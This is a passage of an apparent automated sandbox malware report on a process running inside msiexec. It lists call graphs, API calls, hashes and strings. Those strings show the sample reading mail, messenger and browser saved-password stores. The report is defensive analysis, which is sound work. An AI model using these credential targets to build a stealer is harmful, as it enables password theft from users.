                                                                                                    control_flow_graph 360 410dbb-410dd2 call 410d0e 363 410dd4-410ddd call 4070ae 360->363 364 410dfd-410e1b memset 360->364 371 410ddf-410de2 363->371 372 410dee-410df1 363->372 366 410e27-410e35 364->366 367 410e1d-410e20 364->367 370 410e45-410e4f call 410a9c 366->370 367->366 369 410e22-410e25 367->369 369->366 373 410e37-410e40 369->373 377 410e51-410e76 call 410d3d call 410add 370->377 378 410e7f-410e92 _mbscpy 370->378 371->364 375 410de4-410de7 371->375 380 410df8 372->380 373->370 375->364 379 410de9-410dec 375->379 377->378 382 410e95-410e97 378->382 379->364 379->372 380->382
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76230A60,?,00000000), ref: 00410D1C
                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 119022999-2036018995
                                                                                                    • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                    • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                    Function 004085D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 386 4085d2-408605 call 44b090 call 4082cd call 410a9c 393 4086d8-4086dd 386->393 394 40860b-40863d memset call 410b62 386->394 397 4086c7-4086cc 394->397 398 408642-40865a call 410a9c 397->398 399 4086d2 397->399 402 4086b1-4086c2 call 410b62 398->402 403 40865c-4086ab memset call 410add call 40848b 398->403 399->393 402->397 403->402
                                                                                                    APIs
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                    Strings
                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                    • API String ID: 3996936265-1079885057
                                                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                    Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 434 40ce70-40cea1 call 4023b2 call 401e69 439 40cea3-40cea6 434->439 440 40ceb8 434->440 442 40ceb2 439->442 443 40cea8-40ceb0 439->443 441 40cebd-40cecc _strcmpi 440->441 444 40ced3-40cedc call 40cdda 441->444 445 40cece-40ced1 441->445 446 40ceb4-40ceb6 442->446 443->446 447 40cede-40cef7 call 40c3d0 call 40ba28 444->447 451 40cf3f-40cf43 444->451 445->447 446->441 455 40cef9-40cefd 447->455 456 40cf0e 447->456 457 40cf0a-40cf0c 455->457 458 40ceff-40cf08 455->458 459 40cf13-40cf30 call 40affa 456->459 457->459 458->459 461 40cf35-40cf3a call 40c580 459->461 461->451
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 520177685-3817206916
                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                    Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                    Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4165544737-0
                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                    Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                    Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                    Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                    Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                    Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                    Non-executed Functions

                                                                                                    Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                    • API String ID: 2238633743-192783356
                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                    Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                    Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                    • API String ID: 1865533344-362086290
                                                                                                    • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                    • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                    Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                    Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
